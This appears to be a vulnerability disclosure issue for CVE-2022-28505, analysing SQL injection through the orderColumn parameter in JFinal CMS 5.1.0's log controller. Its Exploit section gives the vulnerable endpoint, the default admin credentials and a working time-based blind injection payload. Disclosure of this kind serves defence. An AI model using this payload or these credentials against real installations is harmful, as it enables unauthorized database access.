Headline
CVE-2022-28505: [CVE-2022-28505] SQL injection vulnerability exists in JFinal CMS 5.1.0 · Issue #33 · jflyfox/jfinal_cms
Jfinal_cms 5.1.0 is vulnerable to SQL Injection via com.jflyfox.system.log.LogController.java.
SQL injection vulnerability exists in JFinal CMS 5.1.0****Analysis
The vulnerability appears in lines 23-47 of the com.jflyfox.system.log.LogController.java
Here call SQLUtils to query with the following statement:
select count(*) from sys_log t where 1=1
When the length of model.getAttrValues() is not equal to 0, go into the if branch and call the whereEquals() method to concatenate
whereEquals():
The SQL statement after concatenation is as follows:
select count(*) from sys_log t where 1=1 AND t.log_type = 1
Moving on, the orderBy parameter is concatenated to the end of the SQL statement
String orderBy = getBaseForm().getorDerby (); defines the source of the orderBy argument
getBaseForm():
getOrderBy():
The orderBy parameter is the form.OrderColumn parameter passed from the front end
So you can construct payload to exploit this vulnerability
Exploit
Maven Startup Environment
Vulnerability address: /jfinal_cms/system/log/list
Administrator login is required. The default account password is admin:admin123
Injection parameters: form.orderColumn
payload:) AND (SELECT 6361 FROM (SELECT(SLEEP(5)))tAVU)-- woqr
SQLMAP Injection: